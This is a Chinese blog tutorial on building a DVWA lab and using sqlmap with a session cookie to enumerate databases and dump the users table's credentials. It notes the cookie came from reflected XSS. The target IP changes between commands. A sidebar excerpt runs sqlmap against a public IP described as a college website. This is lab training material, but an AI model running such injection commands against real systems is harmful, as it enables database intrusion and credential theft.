sqlmap对dvwa靶场的账号密码进行破解

已于 2023-05-16 15:45:11 修改
阅读量1.4k 收藏 9
点赞数 4
文章标签: sql 数据库 安全
于 2023-05-16 15:39:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52934166/article/details/130655051
版权

1.进行靶场搭建

准备两台虚拟机

靶机:win7  

攻击机:kali linux

win7IP 172.26.0.130
kali linuxIP 172.26.0.129

虚拟机搭建好后,相互ping能ping同就行

安装xampp

XAMPP Installers and Downloads for Apache FriendsXAMPP is an easy to install Apache distribution containing MariaDB, PHP and Perl.https://www.apachefriends.org/zh_cn/index.html

xampp内包含以下三种功能模块,xampp可用于快速开发搭建自己的php网站

PHP动态网页设计语言
Apache网络服务器
Mysql关系型数据库管理系统

安装好后的页面

 2.搭建dvwa靶场

下载dvwa

https://github.com/digininja/DVWA

下载后解压将解压的dvwa文件放到xampp安装目录的htdocs文件夹里

完成后启动xampp,并启动xampp里的apache和mysql后面按钮start进行启动,当apache与mysql变成下图绿色后就行了

 3.靶场搭建完成

验证靶场是否搭建成功,用攻击机kali的浏览器访问172.26.0.130/dvwa(172.26.0.130为靶机ip地址,dvwa是解压后dvwa的文件名)

 进入后输入账号:admin密码:password点击login即可登录,并进入靶场主界面,然后选择sql注入

 4.对靶场账号密码进行破解

打开 kali终端输入sqlmap(kali系统自带sqlmap工具无需下载)

sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞,其广泛的功能和选项包括数据库指纹,枚举,数据库提权,访问目标文件系统,并在获取操作权限时执行任意命令。

通过反射型xss拿到cookie值(需要登陆所以需要cookie)

通过sqlmap得到当前服务器所有数据库

sqlmap -u "http://172.26.0.130/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie 'security=low; PHPSESSID=md26gc5jbodavaqr6pu119v4kg' --dbs

--dbs显示所有数据库

 通过sqlmap继续查看dvwa库的所有表(可得guestbook表与users表)

sqlmap -u "http://172.26.0.133/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie 'security=low; PHPSESSID=md26gc5jbodavaqr6pu119v4kg' -D dvwa --tables

-D选择数据库
--tables查看所有表

 据此我们可猜测一下账号密码会在哪个表里(首先盲猜是在users表里,查看字段是找到账号密码的手段之一,一般账号字段为user,密码字段为password)

sqlmap -u "http://172.26.0.133/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie 'security=low; PHPSESSID=md26gc5jbodavaqr6pu119v4kg' -D dvwa -T users --column

-T选择表
--column查看表字段

根据返回的字段我们可以肯定该靶场账号密码都在users表里

我们继续对账号密码进行爆破

-C选择字段
--dump获取字段中的数据

本次教程完毕

希望三连

中将jkx
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
sqlmap实战,攻击学校学院网站(靶机)
Marsper的博客
09-10 1724
sqlmap实战,获取学院网站(靶机)管理员密码 首先获取学院网址,寻找注入点,利用上节学到的sqlmap使用方法 然后直接放进sqlmap里运行,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 如下图 接着找出所有数据库,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 --dbs 运行结果如下 接着选择rjxy数
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
【SQL注入15】自动化注入技术(基于sqlmap工具和sqli-labs-less1靶场平台)
Fighting_hawk的博客
02-22 4258
1. SQLMAP很自动化,能极大提高工作效率; 2. 掌握SQLMAP的常用命令; 3. 通过SQLMAP自动化运行过程代码,加深对注入原理的理解。
sqlmap的使用方法(含靶场
0nc3的博客
11-06 7689
0x00 sqlmap简介 Sqlmap的7种等级: 常用–leve 3 0x01 mysql数据库的注入 靶场地址:http://59.63.200.79:8003 查看数据库名 sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs 查看表 sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe...
SQL注入工具sqlmap安装使用详解&靶场实验
05-14 725
SQL注入工具sqlmap安装使用详解&靶场实验,还有SQL注入攻击流程和MySQL攻击思路解读。
SQLmap使用方法,sqli-labs靶场
ZhangAweio的博客
04-10 489
SQL-map是一个非常强大的注入的工具,自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入,支持mysql、sql-service 等简单使用nmap进行查询数据。
web安全之通过sqlmap工具进行靶场练习
记录学习,一起进步
12-07 1048
web安全之通过sqlmap工具对靶场进行练习
使用sqlmap+burpsuite进行中级sql注入
06-01
使用sqlmap+burpsuite进行中级sql注入,亲测可行
DVWA通关必备软件集(DVWA、PHPStudy、SqlMap、BurpSuite、AntSword、Python、JRE)
05-30
Windows中DVWA通关必备软件集(DVWA、PHPStudy、SqlMap、BurpSuite、AntSword、Python、JRE),包含安装使用说明。 Windows中部署DVWADVWA、PHPStudy Windows中使用SqlMapSqlMap、Python Windows中使用BurpSuite...
使用Sqlmap对ASP网站进行渗透.exe
11-30
使用sqlmap对asp网站的渗透,包含实例,讲解了如何使用kali Linux中的sqlmap工具对网站进行渗透
sqlmap破解版 终极版 附带教程
06-16
sqlmap破解版 终极版 附带教程
通过SQLmap爬数据库获取虚拟机架站的用户名和密码
07-13
通过SQLmap爬数据库获取虚拟机架站的用户名和密码
SQLmap压缩包,SQLmap压缩包
06-07
同时,了解如何正确和合法地使用这个工具至关重要,避免对未经授权的系统进行测试,以免触犯法律。 总的来说,SQLmap是一个强大的工具,对于提高网络安全意识和进行合法的安全测试有着重要的价值。然而,它的使用...
sqlmap-master
01-04
使用SQLMap时,需要遵循合法的渗透测试道德准则,仅在授权或对自身系统进行测试时使用,不得用于非法入侵他人系统。对于开发者而言,了解SQLMap的工作原理有助于提升安全意识,避免在开发过程中引入SQL注入漏洞。 ...
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
在继续之前需要提醒一下,如果读者也想要按本文的步骤进行,需要在NOWASPMutillidae环境搭建好之后先注册一个NOWASPMutillidae帐号。本文演示从web界面注入SQL命令的方法,但不会直接连接到数据库,而是想办法使后端...
Burpsuite 1.6 直接破解 里面有sqlMAP插件
01-15
对web系统中sql注入进行测试,比较好用好,可以使用sqlmap进行自动扫描,还可以抓包进行越权操作,比较使用
渗透测试---手把手教你sqlmap数据库注入测试(1)---靶场实战篇
weixin_52796034的博客
10-14 2640
SQLMap,就像它的名字所暗示的,是一个为我们提供方便的“SQL注入攻击”的工具。对于那些不熟悉这个概念的人来说,SQL注入是一种黑客攻击技术,允许攻击者在目标网站的数据库中执行恶意SQL语句。这意味着我们可以控制和操纵网站的数据,甚至可以完全接管整个网站。那么SQLMap如何帮助我们实现这些呢?
SQL注入靶场_辛巴猫舍
cxllwh的博客
12-22 759
注:可能有的人喜欢用GROUP_CONCAT 函数,即通过,间隔将多行数据进行整合在一行输出,虽然不用limit去一个一个的查询,但是有的站输出点是由长度限制的,所以会出现输出不完整的情况,在此建议大家习惯利用limit分页查询来输出。输入order by 1和order by 2时页面正常,到order by 3的时候页面显示异常,由此可以得到字段数为2。3.寻找回显点,构造?1.首先我们查一下该数据库有几行,将id=1分别换为2,3,4进行测试,发现到id=4时页面不再显示。漏洞类型:SQL注入。
SQLMap入门:渗透靶场
ailx10
12-20 374
大黑客:小v呀,最近清华的瓜吃了吗?ailx10:昨晚 @贱贱 老师发录音,我连夜爬起来开电脑下载呀,哈哈哈嗝大黑客:我刚刚用SQLMap对你靶场拖库了,看你把自己学校改回来了ailx10:哈哈,玩不过清华的,你咋又在我的网站上做实验呢?上面的场景中,拖库,SQLMap相信玩渗透的都很熟悉的名字,对于我自己写的信息安全实验靶场SQLMap可以轻松渗透。在线实验环境:http://144.34.1...
sqlmapdvwa
最新发布
06-14
SQLMap是一个著名的开源工具,用于自动化SQL注入攻击检测和利用。DVWA(Damn Vulnerable Web Application)是一个非常受欢迎的网络安全教育工具,设计用来演示各种常见的Web应用程序漏洞,包括SQL注入。 当你使用SQLMapDVWA进行渗透测试时,你可以执行以下几个步骤: 1. **下载并安装**:首先,你需要从SQLMap的官方GitHub仓库下载最新版本,并按照指示安装在你的测试环境中。 2. **目标设置**:连接到DVWA的服务器,通常它运行在本地或通过虚拟主机,然后确定目标URL以及你想要注入的页面,如登录、注册等有SQL查询的地方。 3. **SQL注入测试**:使用SQLMap的`-u`参数指定URL,然后执行`-D`选项以探测数据库类型,`-T`选项选择表名,`-t`选择测试字段,SQLMap会尝试识别和利用可能的SQL注入点。 4. **数据获取**:利用找到的漏洞,你可以获取数据库中的敏感信息,比如用户名和密码,或者执行未授权的操作,如修改数据。 5. **学习和防御**:这个过程有助于理解实际的攻击原理,并学习如何在代码层面修复这些漏洞,例如使用预编译语句、参数化查询等方法来防止SQL注入。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

中将jkx

一起努力吧

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值